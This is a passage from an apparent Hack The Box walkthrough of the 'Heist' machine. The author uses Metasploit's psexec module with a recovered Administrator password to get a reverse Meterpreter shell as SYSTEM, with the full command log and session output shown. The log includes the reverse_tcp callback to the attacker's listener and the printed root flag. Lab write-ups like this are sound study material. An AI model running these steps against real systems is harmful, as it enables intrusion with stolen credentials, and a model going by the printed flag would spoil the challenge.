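Run it as python3 carve_creds.py firefox.dmp; the parameter names default to the ones this login form uses and can be changed via the two keyword arguments for other applications.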

We could simply log in again with evil-winrm, but this time let's use msfconsole and its psexec module instead.

┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox]
└─$ msfconsole                                                                                                                                                                                                                             
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1382 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your 
module, why not try the reload command
Metasploit Documentation: https://docs.metasploit.com/

Check which parameters need to be set with options.

msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.26.130.26    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

Set the following parameters:

  • RHOSTS: the target machine
  • RPORT: 445
  • SMBPass: 4dD!5}x/re8]FBuZ
  • SMBUser: Administrator
  • SMBSHARE: ADMIN$
  • LHOST: your HTB VPN (tun0) address. The default picked up above, 172.26.130.26, is a local interface the target cannot reach over the VPN; the run below shows the handler listening on 10.10.16.6 instead.
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.96.157
RHOSTS => 10.129.96.157
msf6 exploit(windows/smb/psexec) > set RPORT 445
RPORT => 445
msf6 exploit(windows/smb/psexec) > set SMBPass 4dD!5}x/re8]FBuZ
SMBPass => 4dD!5}x/re8]FBuZ
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBSHARE ADMIN$
SMBSHARE => ADMIN$

Once the parameters are set, run the module.
psexec authenticates to the ADMIN$ share over SMB with the recovered password and uses the service control manager to launch the payload (here as a PowerShell command), which runs as SYSTEM. When it succeeds, typing shell in the Meterpreter session drops us into a command prompt and our privilege escalation is complete!

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.16.6:4444 
[*] 10.129.96.157:445 - Connecting to the server...
[*] 10.129.96.157:445 - Authenticating to 10.129.96.157:445 as user 'Administrator'...
[*] 10.129.96.157:445 - Selecting PowerShell target
[*] 10.129.96.157:445 - Executing the payload...
[+] 10.129.96.157:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 10.129.96.157
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.129.96.157:49686) at 2023-09-12 08:06:48 +0900

meterpreter > shell
Process 4760 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd \users\administrator
cd \users\administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FA65-CD36

 Directory of C:\Users\Administrator\Desktop

02/18/2021  04:00 PM    <DIR>          .
02/18/2021  04:00 PM    <DIR>          ..
09/12/2023  04:11 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,738,165,248 bytes free

C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
cfd19444abeea6036035be9dcaf6cbb1

C:\Users\Administrator\Desktop>

Summary

This time we decoded the encrypted passwords configured on a Cisco device and used them to break into the server.
It is a little exciting to think that products we see every day could be hacked like this! (lol)

References

0xdf hacks stuff: https://0xdf.gitlab.io/2019/11/30/htb-heist.html

About the author

I started this blog to study information security.
I am a newcomer, so I would appreciate your patience.
There is also "Teech Lab." for learning programming in a fun way; if you are interested in software development too, please take a look!
